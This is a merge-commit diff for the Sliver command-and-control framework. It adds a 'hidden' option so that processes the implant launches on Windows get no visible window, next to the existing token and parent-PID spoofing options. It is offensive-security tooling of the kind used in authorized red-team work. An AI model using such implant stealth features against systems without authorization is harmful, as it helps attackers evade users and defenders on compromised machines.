Merge pull request #1301 from BishopFox/windows-hidden-exec

Hidden windows for Executed Processes on Windows

client/command/exec/execute.go

@@ -44,6 +44,7 @@ func ExecuteCmd(cmd *cobra.Command, con *console.SliverConsoleClient, args []str
 	args = args[1:]
 
 	token, _ := cmd.Flags().GetBool("token")
+	hidden, _ := cmd.Flags().GetBool("hidden")
 	output, _ := cmd.Flags().GetBool("output")
 	stdout, _ := cmd.Flags().GetString("stdout")
 	stderr, _ := cmd.Flags().GetString("stderr")
@@ -64,16 +65,21 @@ func ExecuteCmd(cmd *cobra.Command, con *console.SliverConsoleClient, args []str
 
 	ctrl := make(chan bool)
 	con.SpinUntil(fmt.Sprintf("Executing %s %s ...", cmdPath, strings.Join(args, " ")), ctrl)
-	if token || ppid != 0 {
+	if token || hidden || ppid != 0 {
+		if session.OS != "windows" {
+			con.PrintErrorf("The token, hide window, and ppid options are not valid on %s\n", session.OS)
+			return
+		}
 		exec, err = con.Rpc.ExecuteWindows(context.Background(), &sliverpb.ExecuteWindowsReq{
-			Request:  con.ActiveTarget.Request(cmd),
-			Path:     cmdPath,
-			Args:     args,
-			Output:   captureOutput,
-			Stderr:   stderr,
-			Stdout:   stdout,
-			UseToken: token,
-			PPid:     ppid,
+			Request:    con.ActiveTarget.Request(cmd),
+			Path:       cmdPath,
+			Args:       args,
+			Output:     captureOutput,
+			Stderr:     stderr,
+			Stdout:     stdout,
+			UseToken:   token,
+			HideWindow: hidden,
+			PPid:       ppid,
 		})
 	} else {
 		exec, err = con.Rpc.Execute(context.Background(), &sliverpb.ExecuteReq{

client/command/sliver.go

@@ -456,7 +456,7 @@ func SliverCommands(con *client.SliverConsoleClient) console.Commands {
 		}
 		sliver.AddCommand(executeCmd)
 		Flags("", false, executeCmd, func(f *pflag.FlagSet) {
-			f.BoolP("token", "T", false, "execute command with current token (windows only)")
+			f.BoolP("token", "T", false, "execute command with current token (Windows only)")
 			f.BoolP("output", "o", false, "capture command output")
 			f.BoolP("save", "s", false, "save output to a file")
 			f.BoolP("loot", "X", false, "save output as loot")
@@ -465,6 +465,7 @@ func SliverCommands(con *client.SliverConsoleClient) console.Commands {
 			f.StringP("stderr", "E", "", "remote path to redirect STDERR to")
 			f.StringP("name", "n", "", "name to assign loot (optional)")
 			f.Uint32P("ppid", "P", 0, "parent process id (optional, Windows only)")
+			f.BoolP("hidden", "H", false, "hide the window of the spawned process (Windows only)")
 
 			f.Int64P("timeout", "t", defaultTimeout, "grpc timeout in seconds")
 		})

implant/sliver/handlers/handlers_windows.go

@@ -365,6 +365,8 @@ func executeWindowsHandler(data []byte, resp RPCResponse) {
 	if execReq.UseToken {
 		cmd.SysProcAttr.Token = syscall.Token(priv.CurrentToken)
 	}
+	// Hide the window if requested
+	cmd.SysProcAttr.HideWindow = execReq.HideWindow
 	if execReq.PPid != 0 {
 		err := spoof.SpoofParent(execReq.PPid, cmd)
 		if err != nil {
@@ -794,11 +796,11 @@ func listExtensionsHandler(data []byte, resp RPCResponse) {
 }
 
 // Stub since Windows doesn't support UID
-func getUid(fileInfo os.FileInfo) (string) {
+func getUid(fileInfo os.FileInfo) string {
 	return ""
 }
 
 // Stub since Windows doesn't support GID
-func getGid(fileInfo os.FileInfo) (string) {
-    return ""
+func getGid(fileInfo os.FileInfo) string {
+	return ""
 }

protobuf/sliverpb/sliver.proto

@@ -442,6 +442,7 @@ message ExecuteWindowsReq {
   string Stdout = 4;
   string Stderr = 5;
   bool UseToken = 6;
+  bool HideWindow = 7;
   uint32 PPid = 10;
 
   commonpb.Request Request = 9;